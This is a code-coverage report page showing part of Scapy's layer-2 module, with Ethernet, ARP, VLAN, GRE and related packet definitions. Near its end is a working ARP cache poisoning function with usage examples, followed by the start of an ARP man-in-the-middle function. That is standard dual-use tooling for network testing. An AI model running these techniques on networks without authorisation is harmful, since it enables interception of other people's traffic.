Coverage for /pythoncovmergedfiles/medio/medio/usr/local/lib/python3.11/site-packages/scapy/layers/l2.py: 50%

Shortcuts on this page

r m x   toggle line displays

j k   next/prev highlighted chunk

0   (zero) top of page

1   (one) first highlighted chunk

518 statements  

1# SPDX-License-Identifier: GPL-2.0-only 

2# This file is part of Scapy 

3# See https://scapy.net/ for more information 

4# Copyright (C) Philippe Biondi <phil@secdev.org> 

5 

6""" 

7Classes and functions for layer 2 protocols. 

8""" 

9 

10import itertools 

11import socket 

12import struct 

13import time 

14 

15from scapy.ansmachine import AnsweringMachine 

16from scapy.arch import get_if_addr, get_if_hwaddr 

17from scapy.base_classes import Gen, Net, _ScopedIP 

18from scapy.compat import chb 

19from scapy.config import conf 

20from scapy import consts 

21from scapy.data import ARPHDR_ETHER, ARPHDR_LOOPBACK, ARPHDR_METRICOM, \ 

22 DLT_ETHERNET_MPACKET, DLT_LINUX_IRDA, DLT_LINUX_SLL, DLT_LINUX_SLL2, \ 

23 DLT_LOOP, DLT_NULL, ETHER_ANY, ETHER_BROADCAST, ETHER_TYPES, ETH_P_ARP, ETH_P_MACSEC 

24from scapy.error import ( 

25 ScapyNoDstMacException, 

26 log_runtime, 

27 warning, 

28) 

29from scapy.fields import ( 

30 BCDFloatField, 

31 BitField, 

32 ByteEnumField, 

33 ByteField, 

34 ConditionalField, 

35 FCSField, 

36 FieldLenField, 

37 IP6Field, 

38 IPField, 

39 IntEnumField, 

40 IntField, 

41 LenField, 

42 MACField, 

43 MultipleTypeField, 

44 OUIField, 

45 ShortEnumField, 

46 ShortField, 

47 SourceIP6Field, 

48 SourceIPField, 

49 StrFixedLenField, 

50 StrLenField, 

51 ThreeBytesField, 

52 XByteField, 

53 XIntField, 

54 XShortEnumField, 

55 XShortField, 

56) 

57from scapy.interfaces import _GlobInterfaceType, resolve_iface 

58from scapy.packet import bind_layers, Packet 

59from scapy.plist import ( 

60 PacketList, 

61 QueryAnswer, 

62 SndRcvList, 

63 _PacketList, 

64) 

65from scapy.sendrecv import sendp, srp, srp1, srploop 

66from scapy.utils import ( 

67 checksum, 

68 hexdump, 

69 hexstr, 

70 in4_getnsmac, 

71 in4_ismaddr, 

72 inet_aton, 

73 inet_ntoa, 

74 mac2str, 

75 pretty_list, 

76 valid_mac, 

77 valid_net, 

78 valid_net6, 

79) 

80 

81# Typing imports 

82from typing import ( 

83 Any, 

84 Callable, 

85 Dict, 

86 Iterable, 

87 List, 

88 Optional, 

89 Tuple, 

90 Type, 

91 Union, 

92 cast, 

93) 

94from scapy.interfaces import NetworkInterface 

95 

96 

97if conf.route is None: 

98 # unused import, only to initialize conf.route 

99 import scapy.route # noqa: F401 

100 

101 

102# type definitions 

103_ResolverCallable = Callable[[Packet, Packet], Optional[str]] 

104 

105################# 

106# Tools # 

107################# 

108 

109 

110class Neighbor: 

111 def __init__(self): 

112 # type: () -> None 

113 self.resolvers = {} # type: Dict[Tuple[Type[Packet], Type[Packet]], _ResolverCallable] # noqa: E501 

114 

115 def register_l3(self, l2, l3, resolve_method): 

116 # type: (Type[Packet], Type[Packet], _ResolverCallable) -> None 

117 self.resolvers[l2, l3] = resolve_method 

118 

119 def resolve(self, l2inst, l3inst): 

120 # type: (Packet, Packet) -> Optional[str] 

121 k = l2inst.__class__, l3inst.__class__ 

122 if k in self.resolvers: 

123 return self.resolvers[k](l2inst, l3inst) 

124 return None 

125 

126 def __repr__(self): 

127 # type: () -> str 

128 return "\n".join("%-15s -> %-15s" % (l2.__name__, l3.__name__) for l2, l3 in self.resolvers) # noqa: E501 

129 

130 

131conf.neighbor = Neighbor() 

132 

133# cache entries expire after 120s 

134_arp_cache = conf.netcache.new_cache("arp_cache", 120) 

135 

136 

137@conf.commands.register 

138def getmacbyip(ip, chainCC=0): 

139 # type: (str, int) -> Optional[str] 

140 """ 

141 Returns the destination MAC address used to reach a given IP address. 

142 

143 This will follow the routing table and will issue an ARP request if 

144 necessary. Special cases (multicast, etc.) are also handled. 

145 

146 .. seealso:: :func:`~scapy.layers.inet6.getmacbyip6` for IPv6. 

147 """ 

148 # Sanitize the IP 

149 if isinstance(ip, Net): 

150 ip = next(iter(ip)) 

151 ip = inet_ntoa(inet_aton(ip or "0.0.0.0")) 

152 

153 # Multicast 

154 if in4_ismaddr(ip): # mcast @ 

155 mac = in4_getnsmac(inet_aton(ip)) 

156 return mac 

157 

158 # Check the routing table 

159 iff, _, gw = conf.route.route(ip) 

160 

161 # Limited broadcast 

162 if ip == "255.255.255.255": 

163 return "ff:ff:ff:ff:ff:ff" 

164 

165 # Directed broadcast 

166 if (iff == conf.loopback_name) or (ip in conf.route.get_if_bcast(iff)): 

167 return "ff:ff:ff:ff:ff:ff" 

168 

169 # An ARP request is necessary 

170 if gw != "0.0.0.0": 

171 ip = gw 

172 

173 # Check the cache 

174 mac = _arp_cache.get(ip) 

175 if mac: 

176 return mac 

177 

178 try: 

179 res = srp1(Ether(dst=ETHER_BROADCAST) / ARP(op="who-has", pdst=ip), 

180 type=ETH_P_ARP, 

181 iface=iff, 

182 timeout=2, 

183 verbose=0, 

184 chainCC=chainCC, 

185 nofilter=1) 

186 except Exception as ex: 

187 warning("getmacbyip failed on %s", ex) 

188 return None 

189 if res is not None: 

190 mac = res.payload.hwsrc 

191 _arp_cache[ip] = mac 

192 return mac 

193 return None 

194 

195 

196# Fields 

197 

198class DestMACField(MACField): 

199 def __init__(self, name): 

200 # type: (str) -> None 

201 MACField.__init__(self, name, None) 

202 

203 def i2h(self, pkt, x): 

204 # type: (Optional[Packet], Optional[str]) -> str 

205 if x is None and pkt is not None: 

206 x = None 

207 return super(DestMACField, self).i2h(pkt, x) 

208 

209 def i2m(self, pkt, x): 

210 # type: (Optional[Packet], Optional[str]) -> bytes 

211 if x is None and pkt is not None: 

212 try: 

213 x = conf.neighbor.resolve(pkt, pkt.payload) 

214 except socket.error: 

215 pass 

216 if x is None: 

217 if conf.raise_no_dst_mac: 

218 raise ScapyNoDstMacException() 

219 else: 

220 x = "ff:ff:ff:ff:ff:ff" 

221 warning( 

222 "MAC address to reach destination not found. Using broadcast." 

223 ) 

224 return super(DestMACField, self).i2m(pkt, x) 

225 

226 

227class SourceMACField(MACField): 

228 __slots__ = ["getif"] 

229 

230 def __init__(self, name, getif=None): 

231 # type: (str, Optional[Any]) -> None 

232 MACField.__init__(self, name, None) 

233 self.getif = (lambda pkt: pkt.route()[0]) if getif is None else getif 

234 

235 def i2h(self, pkt, x): 

236 # type: (Optional[Packet], Optional[str]) -> str 

237 if x is None: 

238 iff = self.getif(pkt) 

239 if iff: 

240 x = resolve_iface(iff).mac 

241 if x is None: 

242 x = "00:00:00:00:00:00" 

243 return super(SourceMACField, self).i2h(pkt, x) 

244 

245 def i2m(self, pkt, x): 

246 # type: (Optional[Packet], Optional[Any]) -> bytes 

247 return super(SourceMACField, self).i2m(pkt, self.i2h(pkt, x)) 

248 

249 

250# Layers 

251 

252HARDWARE_TYPES = { 

253 1: "Ethernet (10Mb)", 

254 2: "Ethernet (3Mb)", 

255 3: "AX.25", 

256 4: "Proteon ProNET Token Ring", 

257 5: "Chaos", 

258 6: "IEEE 802 Networks", 

259 7: "ARCNET", 

260 8: "Hyperchannel", 

261 9: "Lanstar", 

262 10: "Autonet Short Address", 

263 11: "LocalTalk", 

264 12: "LocalNet", 

265 13: "Ultra link", 

266 14: "SMDS", 

267 15: "Frame relay", 

268 16: "ATM", 

269 17: "HDLC", 

270 18: "Fibre Channel", 

271 19: "ATM", 

272 20: "Serial Line", 

273 21: "ATM", 

274} 

275 

276ETHER_TYPES[0x88a8] = '802_1AD' 

277ETHER_TYPES[0x88e7] = '802_1AH' 

278ETHER_TYPES[ETH_P_MACSEC] = '802_1AE' 

279 

280 

281class Ether(Packet): 

282 name = "Ethernet" 

283 fields_desc = [DestMACField("dst"), 

284 SourceMACField("src"), 

285 XShortEnumField("type", 0x9000, ETHER_TYPES)] 

286 __slots__ = ["_defrag_pos"] 

287 

288 def hashret(self): 

289 # type: () -> bytes 

290 return struct.pack("H", self.type) + self.payload.hashret() 

291 

292 def answers(self, other): 

293 # type: (Packet) -> int 

294 if isinstance(other, Ether): 

295 if self.type == other.type: 

296 return self.payload.answers(other.payload) 

297 return 0 

298 

299 def mysummary(self): 

300 # type: () -> str 

301 return self.sprintf("%src% > %dst% (%type%)") 

302 

303 @classmethod 

304 def dispatch_hook(cls, _pkt=None, *args, **kargs): 

305 # type: (Optional[bytes], *Any, **Any) -> Type[Packet] 

306 if _pkt and len(_pkt) >= 14: 

307 if struct.unpack("!H", _pkt[12:14])[0] <= 1500: 

308 return Dot3 

309 return cls 

310 

311 

312class Dot3(Packet): 

313 name = "802.3" 

314 fields_desc = [DestMACField("dst"), 

315 SourceMACField("src"), 

316 LenField("len", None, "H")] 

317 

318 def extract_padding(self, s): 

319 # type: (bytes) -> Tuple[bytes, bytes] 

320 tmp_len = self.len 

321 return s[:tmp_len], s[tmp_len:] 

322 

323 def answers(self, other): 

324 # type: (Packet) -> int 

325 if isinstance(other, Dot3): 

326 return self.payload.answers(other.payload) 

327 return 0 

328 

329 def mysummary(self): 

330 # type: () -> str 

331 return "802.3 %s > %s" % (self.src, self.dst) 

332 

333 @classmethod 

334 def dispatch_hook(cls, _pkt=None, *args, **kargs): 

335 # type: (Optional[Any], *Any, **Any) -> Type[Packet] 

336 if _pkt and len(_pkt) >= 14: 

337 if struct.unpack("!H", _pkt[12:14])[0] > 1500: 

338 return Ether 

339 return cls 

340 

341 

342class LLC(Packet): 

343 name = "LLC" 

344 fields_desc = [XByteField("dsap", 0x00), 

345 XByteField("ssap", 0x00), 

346 ByteField("ctrl", 0)] 

347 

348 

349def l2_register_l3(l2: Packet, l3: Packet) -> Optional[str]: 

350 """ 

351 Delegates resolving the default L2 destination address to the payload of L3. 

352 """ 

353 neighbor = conf.neighbor # type: Neighbor 

354 return neighbor.resolve(l2, l3.payload) 

355 

356 

357conf.neighbor.register_l3(Ether, LLC, l2_register_l3) 

358conf.neighbor.register_l3(Dot3, LLC, l2_register_l3) 

359 

360 

361COOKED_LINUX_PACKET_TYPES = { 

362 0: "unicast", 

363 1: "broadcast", 

364 2: "multicast", 

365 3: "unicast-to-another-host", 

366 4: "sent-by-us" 

367} 

368 

369 

370class CookedLinux(Packet): 

371 # Documentation: http://www.tcpdump.org/linktypes/LINKTYPE_LINUX_SLL.html 

372 name = "cooked linux" 

373 # from wireshark's database 

374 fields_desc = [ShortEnumField("pkttype", 0, COOKED_LINUX_PACKET_TYPES), 

375 XShortField("lladdrtype", 512), 

376 ShortField("lladdrlen", 0), 

377 StrFixedLenField("src", b"", 8), 

378 XShortEnumField("proto", 0x800, ETHER_TYPES)] 

379 

380 

381class CookedLinuxV2(CookedLinux): 

382 # Documentation: https://www.tcpdump.org/linktypes/LINKTYPE_LINUX_SLL2.html 

383 name = "cooked linux v2" 

384 fields_desc = [XShortEnumField("proto", 0x800, ETHER_TYPES), 

385 ShortField("reserved", 0), 

386 IntField("ifindex", 0), 

387 XShortField("lladdrtype", 512), 

388 ByteEnumField("pkttype", 0, COOKED_LINUX_PACKET_TYPES), 

389 ByteField("lladdrlen", 0), 

390 StrFixedLenField("src", b"", 8)] 

391 

392 

393class MPacketPreamble(Packet): 

394 # IEEE 802.3br Figure 99-3 

395 name = "MPacket Preamble" 

396 fields_desc = [StrFixedLenField("preamble", b"", length=8), 

397 FCSField("fcs", 0, fmt="!I")] 

398 

399 

400class SNAP(Packet): 

401 name = "SNAP" 

402 fields_desc = [OUIField("OUI", 0x000000), 

403 XShortEnumField("code", 0x000, ETHER_TYPES)] 

404 

405 

406conf.neighbor.register_l3(Dot3, SNAP, l2_register_l3) 

407 

408 

409class Dot1Q(Packet): 

410 name = "802.1Q" 

411 aliastypes = [Ether] 

412 fields_desc = [BitField("prio", 0, 3), 

413 BitField("dei", 0, 1), 

414 BitField("vlan", 1, 12), 

415 XShortEnumField("type", 0x0000, ETHER_TYPES)] 

416 deprecated_fields = { 

417 "id": ("dei", "2.5.0"), 

418 } 

419 

420 def answers(self, other): 

421 # type: (Packet) -> int 

422 if isinstance(other, Dot1Q): 

423 if ((self.type == other.type) and 

424 (self.vlan == other.vlan)): 

425 return self.payload.answers(other.payload) 

426 else: 

427 return self.payload.answers(other) 

428 return 0 

429 

430 def default_payload_class(self, pay): 

431 # type: (bytes) -> Type[Packet] 

432 if self.type <= 1500: 

433 return LLC 

434 return conf.raw_layer 

435 

436 def extract_padding(self, s): 

437 # type: (bytes) -> Tuple[bytes, Optional[bytes]] 

438 if self.type <= 1500: 

439 return s[:self.type], s[self.type:] 

440 return s, None 

441 

442 def mysummary(self): 

443 # type: () -> str 

444 if isinstance(self.underlayer, Ether): 

445 return self.underlayer.sprintf("802.1q %Ether.src% > %Ether.dst% (%Dot1Q.type%) vlan %Dot1Q.vlan%") # noqa: E501 

446 else: 

447 return self.sprintf("802.1q (%Dot1Q.type%) vlan %Dot1Q.vlan%") 

448 

449 

450conf.neighbor.register_l3(Ether, Dot1Q, l2_register_l3) 

451 

452 

453class STP(Packet): 

454 name = "Spanning Tree Protocol" 

455 fields_desc = [ShortField("proto", 0), 

456 ByteField("version", 0), 

457 ByteField("bpdutype", 0), 

458 ByteField("bpduflags", 0), 

459 ShortField("rootid", 0), 

460 MACField("rootmac", ETHER_ANY), 

461 IntField("pathcost", 0), 

462 ShortField("bridgeid", 0), 

463 MACField("bridgemac", ETHER_ANY), 

464 ShortField("portid", 0), 

465 BCDFloatField("age", 1), 

466 BCDFloatField("maxage", 20), 

467 BCDFloatField("hellotime", 2), 

468 BCDFloatField("fwddelay", 15)] 

469 

470 

471class ARP(Packet): 

472 name = "ARP" 

473 fields_desc = [ 

474 XShortEnumField("hwtype", 0x0001, HARDWARE_TYPES), 

475 XShortEnumField("ptype", 0x0800, ETHER_TYPES), 

476 FieldLenField("hwlen", None, fmt="B", length_of="hwsrc"), 

477 FieldLenField("plen", None, fmt="B", length_of="psrc"), 

478 ShortEnumField("op", 1, { 

479 "who-has": 1, 

480 "is-at": 2, 

481 "RARP-req": 3, 

482 "RARP-rep": 4, 

483 "Dyn-RARP-req": 5, 

484 "Dyn-RAR-rep": 6, 

485 "Dyn-RARP-err": 7, 

486 "InARP-req": 8, 

487 "InARP-rep": 9 

488 }), 

489 MultipleTypeField( 

490 [ 

491 (SourceMACField("hwsrc"), 

492 (lambda pkt: pkt.hwtype == 1 and pkt.hwlen == 6, 

493 lambda pkt, val: pkt.hwtype == 1 and ( 

494 pkt.hwlen == 6 or (pkt.hwlen is None and 

495 (val is None or len(val) == 6 or 

496 valid_mac(val))) 

497 ))), 

498 ], 

499 StrFixedLenField("hwsrc", None, length_from=lambda pkt: pkt.hwlen), 

500 ), 

501 MultipleTypeField( 

502 [ 

503 (SourceIPField("psrc"), 

504 (lambda pkt: pkt.ptype == 0x0800 and pkt.plen == 4, 

505 lambda pkt, val: pkt.ptype == 0x0800 and ( 

506 pkt.plen == 4 or (pkt.plen is None and 

507 (val is None or valid_net(val))) 

508 ))), 

509 (SourceIP6Field("psrc"), 

510 (lambda pkt: pkt.ptype == 0x86dd and pkt.plen == 16, 

511 lambda pkt, val: pkt.ptype == 0x86dd and ( 

512 pkt.plen == 16 or (pkt.plen is None and 

513 (val is None or valid_net6(val))) 

514 ))), 

515 ], 

516 StrFixedLenField("psrc", None, length_from=lambda pkt: pkt.plen), 

517 ), 

518 MultipleTypeField( 

519 [ 

520 (MACField("hwdst", ETHER_ANY), 

521 (lambda pkt: pkt.hwtype == 1 and pkt.hwlen == 6, 

522 lambda pkt, val: pkt.hwtype == 1 and ( 

523 pkt.hwlen == 6 or (pkt.hwlen is None and 

524 (val is None or len(val) == 6 or 

525 valid_mac(val))) 

526 ))), 

527 ], 

528 StrFixedLenField("hwdst", None, length_from=lambda pkt: pkt.hwlen), 

529 ), 

530 MultipleTypeField( 

531 [ 

532 (IPField("pdst", "0.0.0.0"), 

533 (lambda pkt: pkt.ptype == 0x0800 and pkt.plen == 4, 

534 lambda pkt, val: pkt.ptype == 0x0800 and ( 

535 pkt.plen == 4 or (pkt.plen is None and 

536 (val is None or valid_net(val))) 

537 ))), 

538 (IP6Field("pdst", "::"), 

539 (lambda pkt: pkt.ptype == 0x86dd and pkt.plen == 16, 

540 lambda pkt, val: pkt.ptype == 0x86dd and ( 

541 pkt.plen == 16 or (pkt.plen is None and 

542 (val is None or valid_net6(val))) 

543 ))), 

544 ], 

545 StrFixedLenField("pdst", None, length_from=lambda pkt: pkt.plen), 

546 ), 

547 ] 

548 

549 def hashret(self): 

550 # type: () -> bytes 

551 return struct.pack(">HHH", self.hwtype, self.ptype, 

552 ((self.op + 1) // 2)) + self.payload.hashret() 

553 

554 def answers(self, other): 

555 # type: (Packet) -> int 

556 if not isinstance(other, ARP): 

557 return False 

558 if self.op != other.op + 1: 

559 return False 

560 # We use a loose comparison on psrc vs pdst to catch answers 

561 # with ARP leaks 

562 self_psrc = self.get_field('psrc').i2m(self, self.psrc) # type: bytes 

563 other_pdst = other.get_field('pdst').i2m(other, other.pdst) \ 

564 # type: bytes 

565 return self_psrc[:len(other_pdst)] == other_pdst[:len(self_psrc)] 

566 

567 def route(self): 

568 # type: () -> Tuple[Optional[str], Optional[str], Optional[str]] 

569 fld, dst = cast(Tuple[MultipleTypeField, str], 

570 self.getfield_and_val("pdst")) 

571 fld_inner, dst = fld._find_fld_pkt_val(self, dst) 

572 scope = None 

573 if isinstance(dst, (Net, _ScopedIP)): 

574 scope = dst.scope 

575 if isinstance(dst, Gen): 

576 dst = next(iter(dst)) 

577 if isinstance(fld_inner, IP6Field): 

578 return conf.route6.route(dst, dev=scope) 

579 elif isinstance(fld_inner, IPField): 

580 return conf.route.route(dst, dev=scope) 

581 else: 

582 return None, None, None 

583 

584 def extract_padding(self, s): 

585 # type: (bytes) -> Tuple[bytes, bytes] 

586 return b"", s 

587 

588 def mysummary(self): 

589 # type: () -> str 

590 if self.op == 1: 

591 return self.sprintf("ARP who has %pdst% says %psrc%") 

592 if self.op == 2: 

593 return self.sprintf("ARP is at %hwsrc% says %psrc%") 

594 return self.sprintf("ARP %op% %psrc% > %pdst%") 

595 

596 

597def l2_register_l3_arp(l2: Packet, l3: Packet) -> Optional[str]: 

598 """ 

599 Resolves the default L2 destination address when ARP is used. 

600 """ 

601 if l3.op == 1: # who-has 

602 return "ff:ff:ff:ff:ff:ff" 

603 elif l3.op == 2: # is-at 

604 log_runtime.warning( 

605 "You should be providing the Ethernet destination MAC address when " 

606 "sending an is-at ARP." 

607 ) 

608 # Need ARP request to send ARP request... 

609 plen = l3.get_field("pdst").i2len(l3, l3.pdst) 

610 if plen == 4: 

611 return getmacbyip(l3.pdst) 

612 elif plen == 32: 

613 from scapy.layers.inet6 import getmacbyip6 

614 return getmacbyip6(l3.pdst) 

615 # Can't even do that 

616 log_runtime.warning( 

617 "You should be providing the Ethernet destination mac when sending this " 

618 "kind of ARP packets." 

619 ) 

620 return None 

621 

622 

623conf.neighbor.register_l3(Ether, ARP, l2_register_l3_arp) 

624 

625 

626class GRErouting(Packet): 

627 name = "GRE routing information" 

628 fields_desc = [ShortField("address_family", 0), 

629 ByteField("SRE_offset", 0), 

630 FieldLenField("SRE_len", None, "routing_info", "B"), 

631 StrLenField("routing_info", b"", 

632 length_from=lambda pkt: pkt.SRE_len), 

633 ] 

634 

635 

636class GRE(Packet): 

637 name = "GRE" 

638 deprecated_fields = { 

639 "seqence_number": ("sequence_number", "2.4.4"), 

640 } 

641 fields_desc = [BitField("chksum_present", 0, 1), 

642 BitField("routing_present", 0, 1), 

643 BitField("key_present", 0, 1), 

644 BitField("seqnum_present", 0, 1), 

645 BitField("strict_route_source", 0, 1), 

646 BitField("recursion_control", 0, 3), 

647 BitField("flags", 0, 5), 

648 BitField("version", 0, 3), 

649 XShortEnumField("proto", 0x0000, ETHER_TYPES), 

650 ConditionalField(XShortField("chksum", None), lambda pkt:pkt.chksum_present == 1 or pkt.routing_present == 1), # noqa: E501 

651 ConditionalField(XShortField("offset", None), lambda pkt:pkt.chksum_present == 1 or pkt.routing_present == 1), # noqa: E501 

652 ConditionalField(XIntField("key", None), lambda pkt:pkt.key_present == 1), # noqa: E501 

653 ConditionalField(XIntField("sequence_number", None), lambda pkt:pkt.seqnum_present == 1), # noqa: E501 

654 ] 

655 

656 @classmethod 

657 def dispatch_hook(cls, _pkt=None, *args, **kargs): 

658 # type: (Optional[Any], *Any, **Any) -> Type[Packet] 

659 if _pkt and struct.unpack("!H", _pkt[2:4])[0] == 0x880b: 

660 return GRE_PPTP 

661 return cls 

662 

663 def post_build(self, p, pay): 

664 # type: (bytes, bytes) -> bytes 

665 p += pay 

666 if self.chksum_present and self.chksum is None: 

667 c = checksum(p) 

668 p = p[:4] + chb((c >> 8) & 0xff) + chb(c & 0xff) + p[6:] 

669 return p 

670 

671 

672class GRE_PPTP(GRE): 

673 

674 """ 

675 Enhanced GRE header used with PPTP 

676 RFC 2637 

677 """ 

678 

679 name = "GRE PPTP" 

680 deprecated_fields = { 

681 "seqence_number": ("sequence_number", "2.4.4"), 

682 } 

683 fields_desc = [BitField("chksum_present", 0, 1), 

684 BitField("routing_present", 0, 1), 

685 BitField("key_present", 1, 1), 

686 BitField("seqnum_present", 0, 1), 

687 BitField("strict_route_source", 0, 1), 

688 BitField("recursion_control", 0, 3), 

689 BitField("acknum_present", 0, 1), 

690 BitField("flags", 0, 4), 

691 BitField("version", 1, 3), 

692 XShortEnumField("proto", 0x880b, ETHER_TYPES), 

693 ShortField("payload_len", None), 

694 ShortField("call_id", None), 

695 ConditionalField(XIntField("sequence_number", None), lambda pkt: pkt.seqnum_present == 1), # noqa: E501 

696 ConditionalField(XIntField("ack_number", None), lambda pkt: pkt.acknum_present == 1)] # noqa: E501 

697 

698 def post_build(self, p, pay): 

699 # type: (bytes, bytes) -> bytes 

700 p += pay 

701 if self.payload_len is None: 

702 pay_len = len(pay) 

703 p = p[:4] + chb((pay_len >> 8) & 0xff) + chb(pay_len & 0xff) + p[6:] # noqa: E501 

704 return p 

705 

706 

707# *BSD loopback layer 

708 

709class LoIntEnumField(IntEnumField): 

710 

711 def m2i(self, pkt, x): 

712 # type: (Optional[Packet], int) -> int 

713 return x >> 24 

714 

715 def i2m(self, pkt, x): 

716 # type: (Optional[Packet], Union[List[int], int, None]) -> int 

717 return cast(int, x) << 24 

718 

719 

720# https://github.com/wireshark/wireshark/blob/fe219637a6748130266a0b0278166046e60a2d68/epan/dissectors/packet-null.c 

721# https://www.wireshark.org/docs/wsar_html/epan/aftypes_8h.html 

722LOOPBACK_TYPES = {0x2: "IPv4", 

723 0x7: "OSI", 

724 0x10: "Appletalk", 

725 0x17: "Netware IPX/SPX", 

726 0x18: "IPv6", 0x1c: "IPv6", 0x1e: "IPv6"} 

727 

728 

729# On OpenBSD, Loopback = LoopbackOpenBSD. On other platforms, the 2 are available. 

730# This is to be compatible with both tcpdump and tshark 

731 

732class Loopback(Packet): 

733 r""" 

734 \*BSD loopback layer 

735 """ 

736 __slots__ = ["_defrag_pos"] 

737 name = "Loopback" 

738 if consts.OPENBSD: 

739 fields_desc = [IntEnumField("type", 0x2, LOOPBACK_TYPES)] 

740 else: 

741 fields_desc = [LoIntEnumField("type", 0x2, LOOPBACK_TYPES)] 

742 

743 

744if consts.OPENBSD: 

745 LoopbackOpenBSD = Loopback 

746else: 

747 class LoopbackOpenBSD(Loopback): 

748 name = "OpenBSD Loopback" 

749 fields_desc = [IntEnumField("type", 0x2, LOOPBACK_TYPES)] 

750 

751 

752class Dot1AD(Dot1Q): 

753 name = '802_1AD' 

754 

755 

756class Dot1AH(Packet): 

757 name = "802_1AH" 

758 fields_desc = [BitField("prio", 0, 3), 

759 BitField("dei", 0, 1), 

760 BitField("nca", 0, 1), 

761 BitField("res1", 0, 1), 

762 BitField("res2", 0, 2), 

763 ThreeBytesField("isid", 0)] 

764 

765 def answers(self, other): 

766 # type: (Packet) -> int 

767 if isinstance(other, Dot1AH): 

768 if self.isid == other.isid: 

769 return self.payload.answers(other.payload) 

770 return 0 

771 

772 def mysummary(self): 

773 # type: () -> str 

774 return self.sprintf("802.1ah (isid=%Dot1AH.isid%") 

775 

776 

777conf.neighbor.register_l3(Ether, Dot1AH, l2_register_l3) 

778 

779 

780bind_layers(Dot3, LLC) 

781bind_layers(Ether, LLC, type=122) 

782bind_layers(Ether, LLC, type=34928) 

783bind_layers(Ether, Dot1Q, type=33024) 

784bind_layers(Ether, Dot1AD, type=0x88a8) 

785bind_layers(Ether, Dot1AH, type=0x88e7) 

786bind_layers(Dot1AD, Dot1AD, type=0x88a8) 

787bind_layers(Dot1AD, Dot1Q, type=0x8100) 

788bind_layers(Dot1AD, Dot1AH, type=0x88e7) 

789bind_layers(Dot1Q, Dot1AD, type=0x88a8) 

790bind_layers(Dot1Q, Dot1AH, type=0x88e7) 

791bind_layers(Dot1AH, Ether) 

792bind_layers(Ether, Ether, type=1) 

793bind_layers(Ether, ARP, type=2054) 

794bind_layers(CookedLinux, LLC, proto=122) 

795bind_layers(CookedLinux, Dot1Q, proto=33024) 

796bind_layers(CookedLinux, Dot1AD, type=0x88a8) 

797bind_layers(CookedLinux, Dot1AH, type=0x88e7) 

798bind_layers(CookedLinux, Ether, proto=1) 

799bind_layers(CookedLinux, ARP, proto=2054) 

800bind_layers(MPacketPreamble, Ether) 

801bind_layers(GRE, LLC, proto=122) 

802bind_layers(GRE, Dot1Q, proto=33024) 

803bind_layers(GRE, Dot1AD, type=0x88a8) 

804bind_layers(GRE, Dot1AH, type=0x88e7) 

805bind_layers(GRE, Ether, proto=0x6558) 

806bind_layers(GRE, ARP, proto=2054) 

807bind_layers(GRE, GRErouting, {"routing_present": 1}) 

808bind_layers(GRErouting, conf.raw_layer, {"address_family": 0, "SRE_len": 0}) 

809bind_layers(GRErouting, GRErouting) 

810bind_layers(LLC, STP, dsap=66, ssap=66, ctrl=3) 

811bind_layers(LLC, SNAP, dsap=170, ssap=170, ctrl=3) 

812bind_layers(SNAP, Dot1Q, code=33024) 

813bind_layers(SNAP, Dot1AD, type=0x88a8) 

814bind_layers(SNAP, Dot1AH, type=0x88e7) 

815bind_layers(SNAP, Ether, code=1) 

816bind_layers(SNAP, ARP, code=2054) 

817bind_layers(SNAP, STP, code=267) 

818 

819conf.l2types.register(ARPHDR_ETHER, Ether) 

820conf.l2types.register_num2layer(ARPHDR_METRICOM, Ether) 

821conf.l2types.register_num2layer(ARPHDR_LOOPBACK, Ether) 

822conf.l2types.register_layer2num(ARPHDR_ETHER, Dot3) 

823conf.l2types.register(DLT_LINUX_SLL, CookedLinux) 

824conf.l2types.register(DLT_LINUX_SLL2, CookedLinuxV2) 

825conf.l2types.register(DLT_ETHERNET_MPACKET, MPacketPreamble) 

826conf.l2types.register_num2layer(DLT_LINUX_IRDA, CookedLinux) 

827conf.l2types.register(DLT_NULL, Loopback) 

828conf.l2types.register(DLT_LOOP, LoopbackOpenBSD) 

829 

830conf.l3types.register(ETH_P_ARP, ARP) 

831 

832 

833# Techniques 

834 

835 

836@conf.commands.register 

837def arpcachepoison( 

838 target, # type: Union[str, List[str]] 

839 addresses, # type: Union[str, Tuple[str, str], List[Tuple[str, str]]] 

840 broadcast=False, # type: bool 

841 count=None, # type: Optional[int] 

842 interval=15, # type: int 

843 **kwargs, # type: Any 

844): 

845 # type: (...) -> None 

846 """Poison targets' ARP cache 

847 

848 :param target: Can be an IP, subnet (string) or a list of IPs. This lists the IPs 

849 or the subnet that will be poisoned. 

850 :param addresses: Can be either a string, a tuple of a list of tuples. 

851 If it's a string, it's the IP to advertise to the victim, 

852 with the local interface's MAC. If it's a tuple, 

853 it's ("IP", "MAC"). It it's a list, it's [("IP", "MAC")]. 

854 "IP" can be a subnet of course. 

855 :param broadcast: Use broadcast ethernet 

856 

857 Examples for target "192.168.0.2":: 

858 

859 >>> arpcachepoison("192.168.0.2", "192.168.0.1") 

860 >>> arpcachepoison("192.168.0.1/24", "192.168.0.1") 

861 >>> arpcachepoison(["192.168.0.2", "192.168.0.3"], "192.168.0.1") 

862 >>> arpcachepoison("192.168.0.2", ("192.168.0.1", get_if_hwaddr("virbr0"))) 

863 >>> arpcachepoison("192.168.0.2", [("192.168.0.1", get_if_hwaddr("virbr0"), 

864 ... ("192.168.0.2", "aa:aa:aa:aa:aa:aa")]) 

865 

866 """ 

867 if isinstance(target, str): 

868 targets = Net(target) # type: Union[Net, List[str]] 

869 str_target = target 

870 else: 

871 targets = target 

872 str_target = target[0] 

873 if isinstance(addresses, str): 

874 couple_list = [(addresses, get_if_hwaddr(conf.route.route(str_target)[0]))] 

875 elif isinstance(addresses, tuple): 

876 couple_list = [addresses] 

877 else: 

878 couple_list = addresses 

879 p: List[Packet] = [ 

880 Ether(src=y, dst="ff:ff:ff:ff:ff:ff" if broadcast else None) / 

881 ARP(op="who-has", psrc=x, pdst=targets, 

882 hwsrc=y, hwdst="00:00:00:00:00:00") 

883 for x, y in couple_list 

884 ] 

885 if count is not None: 

886 sendp(p, iface_hint=str_target, count=count, inter=interval, **kwargs) 

887 return 

888 try: 

889 while True: 

890 sendp(p, iface_hint=str_target, **kwargs) 

891 time.sleep(interval) 

892 except KeyboardInterrupt: 

893 pass 

894 

895 

896@conf.commands.register 

897def arp_mitm( 

898 ip1, # type: str 

899 ip2, # type: str 

900 mac1=None, # type: Optional[Union[str, List[str]]] 

901 mac2=None, # type: Optional[Union[str, List[str]]] 

902 broadcast=False, # type: bool 

903 target_mac=None, # type: Optional[str] 

904 iface=None, # type: Optional[_GlobInterfaceType] 

905 inter=3, # type: int 

906): 

907 # type: (...) -> None 

908 r"""ARP MitM: poison 2 target's ARP cache 

909 
